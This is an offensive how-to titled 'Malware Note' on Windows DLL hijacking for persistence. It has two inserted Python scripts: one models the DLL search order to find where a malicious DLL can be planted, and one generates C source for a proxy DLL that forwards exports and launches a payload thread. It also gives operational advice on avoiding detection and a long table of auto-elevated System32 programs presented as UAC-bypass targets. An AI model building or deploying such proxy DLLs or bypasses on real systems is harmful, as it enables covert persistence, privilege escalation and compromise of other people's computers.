Malware Note
1.0.0

Hijacking Auto-Start Programs

Principle:

The hijack is achieved by tampering with, replacing, or proxying the original DLL, so that a program which starts automatically ends up loading attacker-controlled code.

Methods:

1. DLL replacement: replace a legitimate DLL with a malicious one.
2. DLL search-order hijacking: for a DLL that the application loads by name only (no path), place the malicious DLL in a location that is searched before the one holding the genuine DLL. In the standard search order the directory the application was loaded from is probed first, so that directory is the usual target (Microsoft docs: https://docs.microsoft.com/zh-cn/windows/win32/dlls/dynamic-link-library-search-order). Two caveats: with SafeDllSearchMode enabled (the default) the current working directory is probed only after the System32 and Windows directories, and DLLs on the KnownDLLs list are mapped from the \KnownDlls section and never searched for on disk at all.
3. Phantom DLL hijacking: drop a malicious DLL in place of a missing/non-existent DLL that a legitimate application tries to load.
4. DLL redirection: change where DLLs are searched for by editing, for example, the %PATH% environment variable or a .exe.manifest/.exe.local file.
5. WinSxS DLL replacement: replace a legitimate DLL in the WinSxS folder with a malicious one.
6. Relative-path DLL hijacking: copy the legitimate application into a user-writable folder and add the malicious DLL next to it.
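The search order that methods 2, 3, 4 and 6 rely on can be modelled directly. The script below is an added example and is not code from the original page: it encodes the standard search order from the Microsoft documentation linked above (application directory, System32, the 16-bit System directory, the Windows directory, the current directory, then %PATH%, with SafeDllSearchMode moving the current directory up to second place when it is disabled) and, given which directories an attacker can write to and where the genuine DLL lives, reports whether a hijack is possible and which of the methods above it corresponds to. The KnownDLLs subset, the directory names and the writable locations are constructed for the demonstration; on a real host take them from the KnownDLLs registry key and from the directory ACLs.

```python
"""Model of the standard Windows DLL search order and of where a hijack lands.

Added example; not code from the original page. Directory names, the KnownDLLs
subset and the "writable" set are constructed for the demonstration. On a real
host take KnownDLLs from HKLM\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\KnownDLLs
and the writable set from the directory ACLs.
"""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

SYSTEM32 = r"C:\Windows\System32"
SYSTEM16 = r"C:\Windows\System"
WINDIR = r"C:\Windows"

# Constructed subset of KnownDLLs: the loader maps these from the \KnownDlls
# object directory and never probes the file system for them, so none of the
# search-order methods apply to them.
KNOWN_DLLS = {"kernel32.dll", "advapi32.dll", "ole32.dll", "user32.dll", "gdi32.dll"}


@dataclass
class Host:
    app_dir: str                   # directory the EXE was loaded from
    cwd: str                       # current working directory of the process
    path_dirs: list[str]           # %PATH% entries, in order
    existing: dict[str, set[str]]  # dll name -> directories holding a genuine copy
    writable: set[str]             # directories the attacker can write to
    safe_dll_search_mode: bool = True   # HKLM\...\Session Manager\SafeDllSearchMode


def search_order(host: Host) -> list[str]:
    """Directories probed, in order, for a DLL loaded by bare name (no path)."""
    order = [host.app_dir]
    if not host.safe_dll_search_mode:
        order.append(host.cwd)     # legacy mode: CWD is probed right after the app dir
    order += [SYSTEM32, SYSTEM16, WINDIR]
    if host.safe_dll_search_mode:
        order.append(host.cwd)     # default: CWD only after the Windows directories
    order += host.path_dirs
    seen, result = set(), []       # drop duplicates, case-insensitively
    for d in order:
        key = ntpath.normcase(d)
        if key not in seen:
            seen.add(key)
            result.append(d)
    return result


def plan_hijack(host: Host, dll: str) -> dict:
    """Classify how `dll` can be hijacked on `host`.

    method: 'known-dll' (not hijackable), 'none' (genuine copy found before any
    writable dir), 'replace' (genuine copy sits in a writable dir: method 1),
    'search-order' (a writable dir precedes the genuine copy: methods 2/4/6) or
    'phantom' (no genuine copy anywhere: method 3).
    """
    name = dll.lower()
    if name in KNOWN_DLLS:
        return {"method": "known-dll", "location": None, "resolved_from": None}
    present = {ntpath.normcase(d) for k, dirs in host.existing.items()
               if k.lower() == name for d in dirs}
    writable = {ntpath.normcase(d) for d in host.writable}
    order = search_order(host)
    resolved = next((d for d in order if ntpath.normcase(d) in present), None)
    for d in order:
        key = ntpath.normcase(d)
        if key in present:
            method = "replace" if key in writable else "none"
            return {"method": method, "location": d if key in writable else None,
                    "resolved_from": d}
        if key in writable:
            method = "search-order" if resolved else "phantom"
            return {"method": method, "location": d, "resolved_from": resolved}
    return {"method": "none", "location": None, "resolved_from": resolved}


if __name__ == "__main__":
    user_tmp = r"C:\Users\alice\AppData\Local\Temp"     # constructed
    base = dict(cwd=user_tmp, path_dirs=[SYSTEM32, r"C:\Tools"],
                existing={"edputil.dll": {SYSTEM32}}, writable={user_tmp, r"C:\Tools"})
    # computerdefaults.exe started from System32: the genuine edputil.dll wins
    print(plan_hijack(Host(app_dir=SYSTEM32, **base), "edputil.dll"))
    # the same binary copied to a user-writable folder (method 6)
    print(plan_hijack(Host(app_dir=user_tmp, **base), "edputil.dll"))
    # a DLL that exists nowhere: phantom hijack in the first writable dir probed
    print(plan_hijack(Host(app_dir=SYSTEM32, **base), "missing.dll"))
    # and a KnownDLL, which is never looked up on disk
    print(plan_hijack(Host(app_dir=user_tmp, **base), "kernel32.dll"))
```

Running it shows the three situations the method list describes: started from System32, edputil.dll cannot be hijacked because the genuine copy is found first; the same binary copied to a user-writable folder is hijacked from its own directory; a name that exists nowhere becomes a phantom DLL planted in the first writable directory probed, which with SafeDllSearchMode enabled is the current directory only after System32 and the Windows directory have been tried.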

Practical use:

Find executables that start automatically at boot (Run keys, the Startup folder, services, scheduled tasks) and use Process Monitor, filtered on CreateFile operations with a NAME NOT FOUND result on .dll paths, to check whether any DLL they try to load is missing (Process Explorer only lists DLLs that loaded successfully, so it cannot show the failed lookups). If one is missing, drop the malicious DLL at that location (and report it for a CVE while you are at it); if nothing is missing, replace a DLL that is normally loaded. In either case the location you write to must be one the auto-start program actually probes before the genuine DLL, the malicious DLL must match the process architecture, and you should build a DLL forwarder (proxy DLL) so the program keeps working normally, since a program that crashes at every logon is the quickest way to get the persistence noticed.
Shamelessly plugging one of my own articles:
You may want to combine it with the following article to achieve a user-level hijack
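Building the forwarder recommended above is mostly clerical: every export of the genuine DLL has to be re-exported by the malicious one and pointed at a renamed copy of the original. The script below is an added example, not the page author's code: it parses the output of `dumpbin /exports` (a constructed sample for edputil.dll with invented ordinals and RVAs is embedded), emits one MSVC linker pragma per export that forwards it to edputil_orig.dll, and appends a minimal DllMain that starts the payload on a new thread rather than doing work under the loader lock. It assumes that the genuine DLL is renamed to <name>_orig.dll and placed beside the proxy, that the generated file is compiled with MSVC for the same architecture as the target process (the pragma syntax is MSVC-specific), and that the payload function is a placeholder for whatever the operator wants run.

```python
"""Generate the source of a proxy (forwarding) DLL from a `dumpbin /exports` listing.

Added example; not code from the original page. Assumes the genuine DLL is
renamed to <name>_orig.dll next to the proxy and that the output is built with
MSVC (the /export pragma is MSVC-specific). Exports that dumpbin itself shows
as forwarded, or that have no name, print without an RVA and are skipped here;
add those by hand.
"""
import re

# Constructed sample of `dumpbin /exports edputil.dll`; ordinals and RVAs are invented.
SAMPLE_DUMPBIN = """\
Dump of file edputil.dll

  Section contains the following exports for edputil.dll

    00000000 characteristics
           3 number of functions
           3 number of names

    ordinal hint RVA      name

          1    0 00001A10 EdpGetIsManaged
          2    1 00001B40 EdpGetIsManagedEx
          3    2 00001C00 EdpGetEnterpriseIdForFile
"""

# ordinal, hint (hex), RVA (8 hex digits), name: the export rows of dumpbin's table
EXPORT_RE = re.compile(r"^\s*(\d+)\s+[0-9A-Fa-f]+\s+[0-9A-Fa-f]{8}\s+(\S+)\s*$")


def parse_exports(dumpbin_text: str) -> list:
    """Return (ordinal, name) pairs for every named export with an RVA."""
    exports = []
    for line in dumpbin_text.splitlines():
        m = EXPORT_RE.match(line)
        if m:
            exports.append((int(m.group(1)), m.group(2)))
    return exports


def forward_pragmas(exports, real_module: str) -> list:
    """One linker pragma per export, forwarding name and ordinal to the real module."""
    return [f'#pragma comment(linker, "/export:{name}={real_module}.{name},@{ordinal}")'
            for ordinal, name in exports]


def proxy_source(dll_name: str, dumpbin_text: str) -> str:
    """Full C source of the proxy DLL: forwarders plus a DllMain that launches the payload."""
    stem = dll_name.lower()
    if stem.endswith(".dll"):
        stem = stem[:-4]
    real_module = f"{stem}_orig"          # the renamed genuine DLL, e.g. edputil_orig.dll
    pragmas = forward_pragmas(parse_exports(dumpbin_text), real_module)
    body = """\
#include <windows.h>

/* Placeholder payload. DllMain runs while the loader lock is held, so do the
   real work on a separate thread instead of inside DllMain itself. */
static DWORD WINAPI payload(LPVOID unused) { (void)unused; return 0; }

BOOL APIENTRY DllMain(HMODULE h, DWORD reason, LPVOID reserved) {
    (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(h);
        HANDLE t = CreateThread(NULL, 0, payload, NULL, 0, NULL);
        if (t) CloseHandle(t);
    }
    return TRUE;
}
"""
    return "\n".join(pragmas) + "\n\n" + body


if __name__ == "__main__":
    print(proxy_source("edputil.dll", SAMPLE_DUMPBIN))
```

For a table row whose Procedure is a named function, the pragma for that name is what lets the loader resolve the import; for rows listing only DllMain no export is strictly needed, but forwarding everything anyway keeps the program usable after the hijack.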

Appendix

Listed here are the executables in C:\Windows\System32 that are susceptible to DLL hijacking. Next to each executable are one or more DLLs that can be hijacked, together with the DLL function that is called, which makes exploitation straightforward. Every entry is marked as auto-elevated: the executable carries autoElevate in its manifest, so a member of the Administrators group starts it at high integrity without a UAC prompt, and a successful hijack is therefore a UAC bypass as well as a persistence point. Two caveats apply: auto-elevation only holds while the executable sits in its trusted System32 location, so copying it to a user-writable folder (relative-path method) yields code execution as the current user only; and a row whose Procedure is DllMain needs no exports at all, whereas a row naming a function requires the malicious DLL to export that name (forwarding it to the genuine DLL keeps the program working).
Source:
| Auto-elevated | Executable | DLL | Procedure |
|---|---|---|---|
| ✔️ | bthudtask.exe | DEVOBJ.dll | DllMain |
| ✔️ | computerdefaults.exe | CRYPTBASE.DLL | DllMain |
| ✔️ | computerdefaults.exe | edputil.dll | DllMain |
| ✔️ | computerdefaults.exe | edputil.dll | EdpGetIsManaged |
| ✔️ | computerdefaults.exe | MLANG.dll | ConvertINetUnicodeToMultiByte |
| ✔️ | computerdefaults.exe | MLANG.dll | DllMain |
| ✔️ | computerdefaults.exe | PROPSYS.dll | DllMain |
| ✔️ | computerdefaults.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ✔️ | computerdefaults.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD |
| ✔️ | computerdefaults.exe | Secur32.dll | DllMain |
| ✔️ | computerdefaults.exe | SSPICLI.DLL | DllMain |
| ✔️ | computerdefaults.exe | SSPICLI.DLL | GetUserNameExW |
| ✔️ | computerdefaults.exe | WININET.dll | DllMain |
| ✔️ | computerdefaults.exe | WININET.dll | GetUrlCacheEntryBinaryBlob |
| ✔️ | dccw.exe | ColorAdapterClient.dll | DllMain |
| ✔️ | dccw.exe | dxva2.dll | DllMain |
| ✔️ | dccw.exe | mscms.dll | DccwReleaseDisplayProfileAssociationList |
| ✔️ | dccw.exe | mscms.dll | DllMain |
| ✔️ | dccw.exe | mscms.dll | WcsGetCalibrationManagementState |
| ✔️ | dccw.exe | mscms.dll | WcsSetCalibrationManagementState |
| ✔️ | dccw.exe | USERENV.dll | DllMain |
| ✔️ | easinvoker.exe | AUTHZ.dll | DllMain |
| ✔️ | easinvoker.exe | netutils.dll | DllMain |
| ✔️ | easinvoker.exe | samcli.dll | DllMain |
| ✔️ | easinvoker.exe | SAMLIB.dll | DllMain |
| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | DllMain |
| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | FlushInProcTraceSession |
| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcLogger |
| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcTraceFlushTrigger |
| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | InitializeInProcTraceSession |
| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | ShutdownInProcLogger |
| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | ShutdownInProcTraceSession |
| ✔️ | easpolicymanagerbrokerhost.exe | InprocLogger.dll | StopInProcTraceSession |
| ✔️ | easpolicymanagerbrokerhost.exe | policymanager.dll | DllMain |
| ✔️ | fodhelper.exe | CRYPTBASE.DLL | DllMain |
| ✔️ | fodhelper.exe | edputil.dll | DllMain |
| ✔️ | fodhelper.exe | edputil.dll | EdpGetIsManaged |
| ✔️ | fodhelper.exe | MLANG.dll | ConvertINetUnicodeToMultiByte |
| ✔️ | fodhelper.exe | MLANG.dll | DllMain |
| ✔️ | fodhelper.exe | PROPSYS.dll | DllMain |
| ✔️ | fodhelper.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ✔️ | fodhelper.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD |
| ✔️ | fodhelper.exe | Secur32.dll | DllMain |
| ✔️ | fodhelper.exe | SSPICLI.DLL | DllMain |
| ✔️ | fodhelper.exe | SSPICLI.DLL | GetUserNameExW |
| ✔️ | fodhelper.exe | WININET.dll | DllMain |
| ✔️ | fodhelper.exe | WININET.dll | GetUrlCacheEntryBinaryBlob |
| ✔️ | fsavailux.exe | DEVOBJ.dll | DllMain |
| ✔️ | fxsunatd.exe | FXSAPI.dll | DllMain |
| ✔️ | fxsunatd.exe | FXSAPI.dll | FaxConnectFaxServerW |
| ✔️ | fxsunatd.exe | IPHLPAPI.DLL | DllMain |
| ✔️ | fxsunatd.exe | PROPSYS.dll | DllMain |
| ✔️ | immersivetpmvscmgrsvr.exe | DEVOBJ.dll | DllMain |
| ✔️ | iscsicli.exe | DEVOBJ.dll | DllMain |
| ✔️ | iscsicli.exe | ISCSIDSC.dll | DllMain |
| ✔️ | iscsicli.exe | ISCSIDSC.dll | GetIScsiVersionInformation |
| ✔️ | iscsicli.exe | ISCSIUM.dll | DiscpAllocMemory |
| ✔️ | iscsicli.exe | ISCSIUM.dll | DiscpRegisterHeap |
| ✔️ | iscsicli.exe | ISCSIUM.dll | DllMain |
| ✔️ | iscsicli.exe | WMICLNT.dll | DllMain |
| ✔️ | mdsched.exe | bcd.dll | DllMain |
| ✔️ | mschedexe.exe | MaintenanceUI.dll | DllMain |
| ✔️ | msconfig.exe | ATL.DLL | AtlModuleInit |
| ✔️ | msconfig.exe | ATL.DLL | AtlModuleRegisterClassObjects |
| ✔️ | msconfig.exe | ATL.DLL | DllMain |
| ✔️ | msconfig.exe | bcd.dll | DllMain |
| ✔️ | msdt.exe | ATL.DLL | DllMain |
| ✔️ | msdt.exe | Cabinet.dll | DllMain |
| ✔️ | msdt.exe | SSPICLI.DLL | DllMain |
| ✔️ | msdt.exe | UxTheme.dll | DllMain |
| ✔️ | msdt.exe | wer.dll | DllMain |
| ✔️ | msdt.exe | WINHTTP.dll | DllMain |
| ✔️ | multidigimon.exe | NInput.dll | DllMain |
| ✔️ | netplwiz.exe | CRYPTBASE.dll | DllMain |
| ✔️ | netplwiz.exe | DSROLE.dll | DllMain |
| ✔️ | netplwiz.exe | DSROLE.dll | DsRoleGetPrimaryDomainInformation |
| ✔️ | netplwiz.exe | NETPLWIZ.dll | DllMain |
| ✔️ | netplwiz.exe | NETPLWIZ.dll | UsersRunDllW |
| ✔️ | netplwiz.exe | netutils.dll | DllMain |
| ✔️ | netplwiz.exe | netutils.dll | NetApiBufferFree |
| ✔️ | netplwiz.exe | PROPSYS.dll | DllMain |
| ✔️ | netplwiz.exe | samcli.dll | DllMain |
| ✔️ | netplwiz.exe | samcli.dll | NetUserGetInfo |
| ✔️ | netplwiz.exe | SAMLIB.dll | DllMain |
| ✔️ | netplwiz.exe | SAMLIB.dll | SamConnect |
| ✔️ | netplwiz.exe | SAMLIB.dll | SamEnumerateDomainsInSamServer |
| ✔️ | netplwiz.exe | SAMLIB.dll | SamFreeMemory |
| ✔️ | optionalfeatures.exe | DUI70.dll | DllMain |
| ✔️ | optionalfeatures.exe | DUI70.dll | InitProcessPriv |
| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterBaseControls |
| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterCommonControls |
| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterExtendedControls |
| ✔️ | optionalfeatures.exe | DUI70.dll | RegisterStandardControls |
| ✔️ | optionalfeatures.exe | msi.dll | DllMain |
| ✔️ | optionalfeatures.exe | OLEACC.dll | CreateStdAccessibleObject |
| ✔️ | optionalfeatures.exe | OLEACC.dll | DllMain |
| ✔️ | optionalfeatures.exe | OLEACC.dll | GetRoleTextW |
| ✔️ | optionalfeatures.exe | osbaseln.dll | CloseOsBaseline |
| ✔️ | optionalfeatures.exe | osbaseln.dll | DllMain |
| ✔️ | optionalfeatures.exe | osbaseln.dll | OpenOsBaseline |
| ✔️ | optionalfeatures.exe | PROPSYS.dll | DllMain |
| ✔️ | perfmon.exe | ATL.DLL | DllMain |
| ✔️ | perfmon.exe | credui.dll | DllMain |
| ✔️ | perfmon.exe | SspiCli.dll | DllMain |
| ✔️ | printui.exe | IPHLPAPI.DLL | DllMain |
| ✔️ | printui.exe | printui.dll | DllMain |
| ✔️ | printui.exe | printui.dll | PrintUIEntryW |
| ✔️ | printui.exe | PROPSYS.dll | DllMain |
| ✔️ | printui.exe | puiapi.dll | DllMain |
| ✔️ | recdisc.exe | bcd.dll | DllMain |
| ✔️ | recdisc.exe | Cabinet.dll | DllMain |
| ✔️ | recdisc.exe | ReAgent.dll | DllMain |
| ✔️ | rstrui.exe | bcd.dll | DllMain |
| ✔️ | rstrui.exe | ktmw32.dll | DllMain |
| ✔️ | rstrui.exe | SPP.dll | DllMain |
| ✔️ | rstrui.exe | SPP.dll | SxTracerGetThreadContextRetail |
| ✔️ | rstrui.exe | SRCORE.dll | DllMain |
| ✔️ | rstrui.exe | SRCORE.dll | SrFreeRestoreStatus |
| ✔️ | rstrui.exe | VSSAPI.DLL | DllMain |
| ✔️ | rstrui.exe | VssTrace.DLL | DllMain |
| ✔️ | rstrui.exe | wer.dll | DllMain |
| ✔️ | sdclt.exe | bcd.dll | DllMain |
| ✔️ | sdclt.exe | Cabinet.dll | DllMain |
| ✔️ | sdclt.exe | CLDAPI.dll | CfGetPlaceholderStateFromAttributeTag |
| ✔️ | sdclt.exe | CLDAPI.dll | DllMain |
| ✔️ | sdclt.exe | CRYPTBASE.DLL | DllMain |
| ✔️ | sdclt.exe | edputil.dll | DllMain |
| ✔️ | sdclt.exe | edputil.dll | EdpGetIsManaged |
| ✔️ | sdclt.exe | FLTLIB.DLL | DllMain |
| ✔️ | sdclt.exe | PROPSYS.dll | DllMain |
| ✔️ | sdclt.exe | PROPSYS.dll | PSCreateMemoryPropertyStore |
| ✔️ | sdclt.exe | PROPSYS.dll | PSPropertyBag_WriteDWORD |
| ✔️ | sdclt.exe | ReAgent.dll | DllMain |
| ✔️ | sdclt.exe | SPP.dll | DllMain |
| ✔️ | sdclt.exe | SPP.dll | SxTracerGetThreadContextRetail |
| ✔️ | sdclt.exe | SspiCli.dll | DllMain |
| ✔️ | sdclt.exe | SspiCli.dll | GetUserNameExW |
| ✔️ | sdclt.exe | UxTheme.dll | DllMain |
| ✔️ | sdclt.exe | VSSAPI.DLL | DllMain |
| ✔️ | sdclt.exe | VssTrace.DLL | DllMain |
| ✔️ | sdclt.exe | wer.dll | DllMain |
| ✔️ | sdclt.exe | WTSAPI32.dll | DllMain |
| ✔️ | systempropertiesadvanced.exe | bcd.dll | DllMain |
| ✔️ | systempropertiesadvanced.exe | credui.dll | DllMain |
| ✔️ | systempropertiesadvanced.exe | DNSAPI.dll | DllMain |
| ✔️ | systempropertiesadvanced.exe | DSROLE.DLL | DllMain |
| ✔️ | systempropertiesadvanced.exe | DSROLE.DLL | DsRoleGetPrimaryDomainInformation |
| ✔️ | systempropertiesadvanced.exe | LOGONCLI.DLL | DllMain |
| ✔️ | systempropertiesadvanced.exe | netid.dll | CreateNetIDPropertyPage |
| ✔️ | systempropertiesadvanced.exe | netid.dll | DllMain |
| ✔️ | systempropertiesadvanced.exe | NETUTILS.DLL | DllMain |
| ✔️ | systempropertiesadvanced.exe | SRVCLI.DLL | DllMain |
| ✔️ | systempropertiesadvanced.exe | WINBRAND.dll | DllMain |
| ✔️ | systempropertiesadvanced.exe | WINSTA.dll | DllMain |
| ✔️ | systempropertiesadvanced.exe | WKSCLI.DLL | DllMain |
| ✔️ | systempropertiescomputername.exe | bcd.dll | DllMain |
| ✔️ | systempropertiescomputername.exe | WINSTA.dll | DllMain |
| ✔️ | systempropertiesdataexecutionprevention.exe | bcd.dll | DllMain |
| ✔️ | systempropertiesdataexecutionprevention.exe | WINSTA.dll | DllMain |
| ✔️ | systempropertieshardware.exe | bcd.dll | DllMain |
| ✔️ | systempropertieshardware.exe | WINSTA.dll | DllMain |
| ✔️ | systempropertiesprotection.exe | bcd.dll | DllMain |
| ✔️ | systempropertiesprotection.exe | WINSTA.dll | DllMain |
| ✔️ | systempropertiesremote.exe | bcd.dll | DllMain |
| ✔️ | systempropertiesremote.exe | WINSTA.dll | DllMain |
| ✔️ | systemreset.exe | bcd.dll | BcdCloseObject |
| ✔️ | systemreset.exe | bcd.dll | BcdCloseStore |
| ✔️ | systemreset.exe | bcd.dll | BcdFlushStore |
| ✔️ | systemreset.exe | bcd.dll | BcdGetElementData |
| ✔️ | systemreset.exe | bcd.dll | BcdOpenObject |
| ✔️ | systemreset.exe | bcd.dll | BcdOpenStore |